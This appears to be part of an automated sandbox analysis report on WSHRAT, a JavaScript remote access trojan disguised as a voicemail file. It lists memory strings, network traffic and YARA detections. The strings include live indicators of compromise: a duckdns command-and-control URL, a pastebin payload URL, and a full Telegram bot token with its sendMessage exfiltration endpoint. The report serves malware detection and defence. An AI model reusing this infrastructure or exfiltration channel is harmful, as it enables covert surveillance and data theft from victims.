Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readydns.org:8426/is-ready4F=
Source: wscript.exe, 0000000C.00000002.3664182847.0000000006CBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyi
Source: wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyil
Source: wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readym
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyows
Source: wscript.exe, 0000000C.00000003.2776519179.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readysoft
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyz
Source: wscript.exe, 0000000B.00000002.2097462651.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094115487.0000000003515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092299826.0000000006A37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092655310.0000000006A45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092655310.0000000006A42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2053554395.0000000003519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2051852371.0000000003518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092576951.0000000006A24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2097565335.0000000006A45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2097565335.0000000006A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092865617.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094333401.0000000005F93000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092452012.0000000006A3C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2094729720.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663272487.0000000006493000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2093975107.00000000038A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3662661142.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3662635567.00000210134D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.0000021013A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com/raw/NsQ5qTHr
Source: wscript.exe, 0000000C.00000002.3663596969.0000000006C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com/raw/NsQ5qTHr.G5u1
Source: wscript.exe, 00000011.00000002.3663058891.0000021013A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com/raw/NsQ5qTHr9
Source: wscript.exe, 0000000B.00000002.2097462651.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092576951.0000000006A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com/raw/NsQ5qTHrm
Source: wscript.exe, 00000011.00000002.3663058891.0000021013A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com/raw/NsQ5qTHro
Source: wscript.exe, 00000011.00000002.3661806513.0000021012F35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com/raw/NsQ5qTHrst
Source: wscript.exe, 0000000B.00000002.2097000697.00000000069D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.00000210139C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: wscript.exe, 0000000B.00000003.2092865617.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3662661142.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3662635567.00000210134D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: wscript.exe, 0000000B.00000003.2094772697.000000000591A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095984043.000000000591A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094069081.000000000591A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_
Source: wscript.exe, 0000000B.00000003.2094115487.0000000003515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092299826.0000000006A37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092655310.0000000006A45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092655310.0000000006A42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2097565335.0000000006A45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2097565335.0000000006A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092593579.0000000006A1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094688191.0000000006A1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092452012.0000000006A3C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.0000021013A0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.0000021013A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3661737304.00000210112E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO
Source: wscript.exe, 00000011.00000002.3663058891.00000210139EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage
Source: wscript.exe, 00000011.00000002.3663058891.00000210139EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessageZ
Source: wscript.exe, 0000000B.00000003.2094333401.0000000005F93000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663272487.0000000006493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessaget
Source: wscript.exe, 0000000B.00000003.2093298186.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093476765.0000000003302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095486810.000000000331F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093647514.000000000331E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.00000000032F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessagex~
Source: wscript.exe, 00000011.00000002.3662046027.00000210130B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/botx67
Source: wscript.exe, 00000011.00000002.3663058891.00000210139EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org:443/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessageAccept-Lan
Source: Voicemail Jud.html	String found in binary or memory: https://cloudgoogle.pages.dev/love.js
Source: Voicemail Jud.html	String found in binary or memory: https://i.stack.imgur.com/ZU3tO.png
Source: wscript.exe, 0000000B.00000003.2094772697.000000000591A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095984043.000000000591A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094069081.000000000591A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.#
Source: wscript.exe, 0000000B.00000002.2095763149.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094811669.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3661710807.00000000038AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.geo
Source: wscript.exe, 00000011.00000002.3661280933.000002101103B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.00000210139C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.0000021013A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3661737304.00000210112E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.geoiplookup.io/
Source: wscript.exe, 00000011.00000002.3662046027.00000210130B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.geoiplookup.io/C
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003605000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.geoiplookup.io/S
Source: wscript.exe, 0000000B.00000003.2093298186.000000000334B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.000000000334B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095486810.0000000003353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093858081.0000000003352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.geoiplookup.io/ZK
Source: wscript.exe, 0000000B.00000003.2094115487.000000000351D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.geou
Source: wscript.exe, 0000000B.00000003.2093298186.000000000334B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.000000000334B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095486810.0000000003353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093858081.0000000003352000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.00000210139C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comi
Source: wscript.exe, 0000000B.00000002.2097000697.00000000069D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.00000210139C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/
Source: wscript.exe, 00000011.00000002.3663058891.0000021013A4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHr
Source: wscript.exe, 0000000C.00000002.3663596969.0000000006C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHr(F/t
Source: wscript.exe, 00000011.00000002.3661806513.0000021012F35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHr:
Source: wscript.exe, 0000000B.00000002.2097462651.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092576951.0000000006A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHrK
Source: wscript.exe, 0000000B.00000002.2095486810.0000000003370000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.0000000003370000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093298186.0000000003370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHrL
Source: wscript.exe, 0000000B.00000003.2094333401.0000000005F93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHr_n
Source: wscript.exe, 00000011.00000002.3663058891.0000021013A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHra
Source: wscript.exe, 00000011.00000002.3661806513.0000021012F35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHre
Source: wscript.exe, 00000011.00000002.3663058891.0000021013A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHrn
Source: wscript.exe, 00000011.00000002.3663058891.00000210139EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com:443/raw/NsQ5qTHr

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49794 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected WSHRAT

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000B.00000003.2053554395.0000000003517000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2093975107.00000000038A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2092992601.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2197255789.0000000006CBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2443802427.000002101330E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2776254293.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3662166348.00000000059A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2252696295.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3662453793.00000210132F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2039075098.0000000000E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2092554619.0000000005A54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2094186218.000000000573C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2443649511.00000210131BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2047460205.0000000005727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3662373093.0000000005AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2365561540.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2444885075.00000210130B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3662263359.00000210131BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3662635567.00000210134D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3283310659.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3663724443.000002101409B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2092891218.0000000005B96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3228165832.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2122982130.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2091678833.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3661879810.0000021012F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2195388309.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3662661142.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3664293608.0000000006F10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3338153980.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2089734091.0000000006A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2309211314.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2044961577.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2092865617.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3661927957.000000000562A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2093146388.00000000055ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2479670966.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3408776876.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2444105297.00000210130F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2047368224.0000000005204000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2092684570.00000000059AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7za.exe PID: 2936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 1544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000C.00000003.2776254293.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.2252696295.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 00000007.00000003.2039075098.0000000000E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.2365561540.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.3283310659.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.3228165832.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.2122982130.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000B.00000003.2091678833.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.2195388309.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000002.3664293608.0000000006F10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.3338153980.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000B.00000003.2089734091.0000000006A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.2309211314.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.2479670966.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.3408776876.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 00000011.00000003.2444105297.00000210130F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000B.00000003.2047368224.0000000005204000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: 0000000C.00000003.2092684570.00000000059AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: Process Memory Space: 7za.exe PID: 2936, type: MEMORYSTR	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: Process Memory Space: wscript.exe PID: 7076, type: MEMORYSTR	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: Process Memory Space: wscript.exe PID: 1544, type: MEMORYSTR	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: Process Memory Space: wscript.exe PID: 6936, type: MEMORYSTR	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
